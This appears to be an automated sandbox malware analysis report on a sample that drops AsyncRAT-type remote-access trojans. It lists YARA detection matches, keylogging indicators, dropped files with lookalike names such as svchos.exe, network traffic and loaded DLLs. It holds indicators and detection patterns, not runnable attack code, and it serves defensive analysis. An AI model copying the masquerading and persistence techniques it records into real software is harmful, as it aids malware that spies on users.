Source: main.exe, 00000022.00000000.2588365217.00007FF7CDD42000.00000002.00000001.01000000.00000013.sdmp String found in binary or memory: https://doh.familyshield.opendns.com/dns-query
Source: main.exe, 00000022.00000000.2588365217.00007FF7CDD42000.00000002.00000001.01000000.00000013.sdmp String found in binary or memory: https://doh.opendns.com/dns-query
Source: main.exe, 00000022.00000000.2588365217.00007FF7CDD42000.00000002.00000001.01000000.00000013.sdmp String found in binary or memory: https://doh.quickline.ch/dns-query
Source: main.exe, 00000022.00000000.2588365217.00007FF7CDD42000.00000002.00000001.01000000.00000013.sdmp String found in binary or memory: https://doh.xfinity.com/dns-query
Source: sw.pak.21.dr, ca.pak.21.dr, el.pak.21.dr String found in binary or memory: https://myactivity.google.com/
Source: main.exe, 00000022.00000000.2588365217.00007FF7CDD42000.00000002.00000001.01000000.00000013.sdmp String found in binary or memory: https://nextdns.io/privacy
Source: main.exe, 00000022.00000000.2588365217.00007FF7CDD42000.00000002.00000001.01000000.00000013.sdmp String found in binary or memory: https://odvr.nic.cz/doh
Source: main.exe, 00000022.00000000.2588365217.00007FF7CDD42000.00000002.00000001.01000000.00000013.sdmp String found in binary or memory: https://odvr.nic.cz/dohodvr.nic.cz185.43.135.1193.17.47.12001:148f:fffe::12001:148f:ffff::1
Source: el.pak.21.dr String found in binary or memory: https://passwords.google.com
Source: sw.pak.21.dr String found in binary or memory: https://passwords.google.comAkaunti
Source: ca.pak.21.dr String found in binary or memory: https://passwords.google.comCompte
Source: main.exe, 00000022.00000000.2588365217.00007FF7CDD42000.00000002.00000001.01000000.00000013.sdmp String found in binary or memory: https://perfetto.dev/docs/contributing/getting-started#community).
Source: main.exe, 00000022.00000000.2588365217.00007FF7CDD42000.00000002.00000001.01000000.00000013.sdmp String found in binary or memory: https://perfetto.dev/docs/contributing/getting-started#community).No
Source: sw.pak.21.dr, ca.pak.21.dr, el.pak.21.dr String found in binary or memory: https://photos.google.com/settings?referrer=CHROME_NTP
Source: sw.pak.21.dr, ca.pak.21.dr, el.pak.21.dr String found in binary or memory: https://policies.google.com/
Source: main.exe, 00000022.00000000.2588365217.00007FF7CDD42000.00000002.00000001.01000000.00000013.sdmp String found in binary or memory: https://public.dns.iij.jp/
Source: main.exe, 00000022.00000000.2588365217.00007FF7CDD42000.00000002.00000001.01000000.00000013.sdmp String found in binary or memory: https://public.dns.iij.jp/IIJ
Source: main.exe, 00000022.00000000.2588365217.00007FF7CDD42000.00000002.00000001.01000000.00000013.sdmp String found in binary or memory: https://public.dns.iij.jp/dns-query
Source: main.exe, 00000022.00000000.2588365217.00007FF7CDD42000.00000002.00000001.01000000.00000013.sdmp String found in binary or memory: https://public.dns.iij.jp/dns-queryIijUShttps://nextdns.io/privacyNextDNShttps://chromium.dns.nextdn
Source: ca.pak.21.dr, el.pak.21.dr String found in binary or memory: https://support.google.com/chrome/a/?p=block_warn
Source: sw.pak.21.dr, ca.pak.21.dr, el.pak.21.dr String found in binary or memory: https://support.google.com/chrome/answer/6098869
Source: sw.pak.21.dr, ca.pak.21.dr, el.pak.21.dr String found in binary or memory: https://support.google.com/chromebook?p=app_intent
Source: main.exe, 00000022.00000000.2588365217.00007FF7CDD42000.00000002.00000001.01000000.00000013.sdmp String found in binary or memory: https://www.cisco.com/c/en/us/about/legal/privacy-full.html
Source: el.pak.21.dr String found in binary or memory: https://www.google.com/chrome/privacy/eula_text.html
Source: ca.pak.21.dr String found in binary or memory: https://www.google.com/chrome/privacy/eula_text.htmlGestionat
Source: sw.pak.21.dr String found in binary or memory: https://www.google.com/chrome/privacy/eula_text.htmlInasimamiwa
Source: main.exe, 00000022.00000000.2588365217.00007FF7CDD42000.00000002.00000001.01000000.00000013.sdmp String found in binary or memory: https://www.nic.cz/odvr/
Source: main.exe, 00000022.00000000.2588365217.00007FF7CDD42000.00000002.00000001.01000000.00000013.sdmp String found in binary or memory: https://www.nic.cz/odvr/CZ.NIC
Source: main.exe, 00000022.00000000.2588365217.00007FF7CDD42000.00000002.00000001.01000000.00000013.sdmp String found in binary or memory: https://www.quad9.net/home/privacy/
Source: main.exe, 00000022.00000000.2588365217.00007FF7CDD42000.00000002.00000001.01000000.00000013.sdmp String found in binary or memory: https://www.quad9.net/home/privacy/Quad9
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49728

Key, Mouse, Clipboard, Microphone and Screen Capturing
barindex
Yara detected AsyncRAT
Source: Yara match File source: 23.2.start.exe.300be20.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.2.start.exe.300be20.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.0.start.exe.c60000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000017.00000000.2318958962.0000000000C62000.00000002.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.2376656529.000000000300B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: start.exe PID: 368, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\start.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Roaming\svchos.exe, type: DROPPED
Contains functionality to log keystrokes (.Net Source)
Source: start.exe.15.dr, LimeLogger.cs .Net Code: KeyboardLayout
Source: svchos.exe.23.dr, LimeLogger.cs .Net Code: KeyboardLayout
Source: 23.2.start.exe.300be20.0.raw.unpack, LimeLogger.cs .Net Code: KeyboardLayout

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: dump.pcap, type: PCAP Matched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
Source: dump.pcap, type: PCAP Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 23.2.start.exe.300be20.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 23.2.start.exe.300be20.0.unpack, type: UNPACKEDPE Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 23.2.start.exe.300be20.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 23.2.start.exe.300be20.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 23.0.start.exe.c60000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 23.0.start.exe.c60000.0.unpack, type: UNPACKEDPE Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 0000001F.00000002.2498235714.0000000004C66000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000017.00000002.2376190706.0000000001406000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000017.00000002.2376656529.0000000002EC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 00000017.00000002.2376656529.0000000002EC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0000001F.00000002.2491851943.000000000272F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000017.00000000.2318958962.0000000000C62000.00000002.00000001.01000000.0000000E.sdmp, type: MEMORY Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 00000017.00000002.2376656529.000000000300B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 00000017.00000002.2376656529.000000000300B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: Process Memory Space: start.exe PID: 368, type: MEMORYSTR Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: Process Memory Space: start.exe PID: 368, type: MEMORYSTR Matched rule: Detects AsyncRAT Author: ditekSHen
Source: Process Memory Space: svchos.exe PID: 5188, type: MEMORYSTR Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\start.exe, type: DROPPED Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: C:\Users\user\AppData\Local\Temp\start.exe, type: DROPPED Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Drops large PE files
Source: C:\Users\user\AppData\Local\Temp\build.exe File dump: main.exe.21.dr 162036224 Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\build.exe File dump: main.exe0.21.dr 162036224 Jump to dropped file
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\2eHfvuySzqzZl8qUAC9nldhe9q6\ffmpeg.dll F11576BF7FFBC3669D1A5364378F35A1ED0811B7831528B6C4C55B0CDC7DC014
Enables security privileges
Source: C:\Users\user\AppData\Local\Temp\build.exe Process token adjusted: Security Jump to behavior
One or more processes crash
Source: C:\Users\user\AppData\Local\Temp\svchost (3).exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7424 -s 1184
PE file contains executable resources (Code or Archives)
Source: main.exe.21.dr Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: main.exe0.21.dr Static PE information: Resource name: RT_VERSION type: COM executable for DOS
PE file contains more sections than normal
Source: ffmpeg.dll.21.dr Static PE information: Number of sections : 11 > 10
Source: vk_swiftshader.dll.21.dr Static PE information: Number of sections : 12 > 10
Source: libGLESv2.dll0.21.dr Static PE information: Number of sections : 12 > 10
Source: libEGL.dll.21.dr Static PE information: Number of sections : 12 > 10
Source: main.exe0.21.dr Static PE information: Number of sections : 16 > 10
Source: main.exe.21.dr Static PE information: Number of sections : 16 > 10
Source: vulkan-1.dll.21.dr Static PE information: Number of sections : 12 > 10
Source: libGLESv2.dll.21.dr Static PE information: Number of sections : 12 > 10
Source: ffmpeg.dll0.21.dr Static PE information: Number of sections : 11 > 10
Source: vk_swiftshader.dll0.21.dr Static PE information: Number of sections : 12 > 10
Source: libEGL.dll0.21.dr Static PE information: Number of sections : 12 > 10
PE file does not import any functions
Source: svchost (3).exe.15.dr Static PE information: No import functions for PE file found
Sample file is different than original file name gathered from version info
Source: rU6YAgkoAw.exe, 00000000.00000000.1185990442.0000000000B52000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameRtlouimjnsf.exe" vs rU6YAgkoAw.exe
Source: rU6YAgkoAw.exe Binary or memory string: OriginalFilenameRtlouimjnsf.exe" vs rU6YAgkoAw.exe
Tries to load missing DLLs
Source: C:\Users\user\Desktop\rU6YAgkoAw.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\Desktop\rU6YAgkoAw.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\rU6YAgkoAw.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\rU6YAgkoAw.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\rU6YAgkoAw.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\rU6YAgkoAw.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\rU6YAgkoAw.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\rU6YAgkoAw.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\rU6YAgkoAw.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\rU6YAgkoAw.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\rU6YAgkoAw.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\rU6YAgkoAw.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\rU6YAgkoAw.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\rU6YAgkoAw.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\rU6YAgkoAw.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\rU6YAgkoAw.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Users\user\Desktop\rU6YAgkoAw.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Users\user\Desktop\rU6YAgkoAw.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\rU6YAgkoAw.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Users\user\Desktop\rU6YAgkoAw.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Users\user\Desktop\rU6YAgkoAw.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Users\user\Desktop\rU6YAgkoAw.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\rU6YAgkoAw.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\rU6YAgkoAw.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\rU6YAgkoAw.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\rU6YAgkoAw.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\rU6YAgkoAw.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\rU6YAgkoAw.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\rU6YAgkoAw.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\rU6YAgkoAw.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\rU6YAgkoAw.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\rU6YAgkoAw.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\rU6YAgkoAw.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\rU6YAgkoAw.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\rU6YAgkoAw.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\rU6YAgkoAw.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\rU6YAgkoAw.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\rU6YAgkoAw.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\rU6YAgkoAw.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\rU6YAgkoAw.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\rU6YAgkoAw.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmpAADD.tmp.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmpAADD.tmp.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmpAADD.tmp.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmpAADD.tmp.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmpAADD.tmp.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmpAADD.tmp.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmpAADD.tmp.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmpAADD.tmp.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmpAADD.tmp.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmpAADD.tmp.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmpAADD.tmp.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmpAADD.tmp.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmpAADD.tmp.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmpAADD.tmp.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmpAADD.tmp.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmpAADD.tmp.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmpAADD.tmp.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmpAADD.tmp.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmpAADD.tmp.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmpAADD.tmp.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmpAADD.tmp.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmpAADD.tmp.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost (3).exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost (3).exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost (3).exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost (3).exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost (3).exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost (3).exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost (3).exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost (3).exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost (3).exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost (3).exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost (3).exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost (3).exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost (3).exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost (3).exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost (3).exe Section loaded: dwrite.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost (3).exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost (3).exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: dwmapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: oleacc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: shfolder.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: windows.fileexplorer.common.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: ntshrui.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\start.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\start.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\start.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\start.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\start.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\start.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\start.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\start.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\start.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\start.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\start.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\start.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\start.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\start.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\start.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\start.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\start.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\start.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\start.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\start.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\start.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\start.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\start.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\start.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\start.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\start.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\start.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\start.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\start.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\start.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: xmllite.dll
Source: C:\Windows\SysWOW64\timeout.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\svchos.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\svchos.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\svchos.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\svchos.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\svchos.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\svchos.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\svchos.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\svchos.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\svchos.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\svchos.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\svchos.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\svchos.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\svchos.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\svchos.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\svchos.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\svchos.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\svchos.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\svchos.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\svchos.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\svchos.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\svchos.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\svchos.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\svchos.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\svchos.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\svchos.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\svchos.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\svchos.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\svchos.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\svchos.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\svchos.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\svchos.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\svchos.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\svchos.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\svchos.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Roaming\svchos.exe Section loaded: secur32.dll
Source: C:\Users\user\AppData\Roaming\svchos.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Roaming\svchos.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Roaming\svchos.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Roaming\svchos.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Roaming\svchos.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Roaming\svchos.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\svchos.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Roaming\svchos.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\svchos.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\2eHfvuySzqzZl8qUAC9nldhe9q6\main.exe Section loaded: ffmpeg.dll
Source: C:\Users\user\AppData\Local\Temp\2eHfvuySzqzZl8qUAC9nldhe9q6\main.exe Section loaded: uiautomationcore.dll
Source: C:\Users\user\AppData\Local\Temp\2eHfvuySzqzZl8qUAC9nldhe9q6\main.exe Section loaded: dbghelp.dll
Source: C:\Users\user\AppData\Local\Temp\2eHfvuySzqzZl8qUAC9nldhe9q6\main.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\2eHfvuySzqzZl8qUAC9nldhe9q6\main.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\2eHfvuySzqzZl8qUAC9nldhe9q6\main.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\2eHfvuySzqzZl8qUAC9nldhe9q6\main.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\2eHfvuySzqzZl8qUAC9nldhe9q6\main.exe Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Local\Temp\2eHfvuySzqzZl8qUAC9nldhe9q6\main.exe Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Temp\2eHfvuySzqzZl8qUAC9nldhe9q6\main.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\2eHfvuySzqzZl8qUAC9nldhe9q6\main.exe Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Temp\2eHfvuySzqzZl8qUAC9nldhe9q6\main.exe Section loaded: propsys.dll
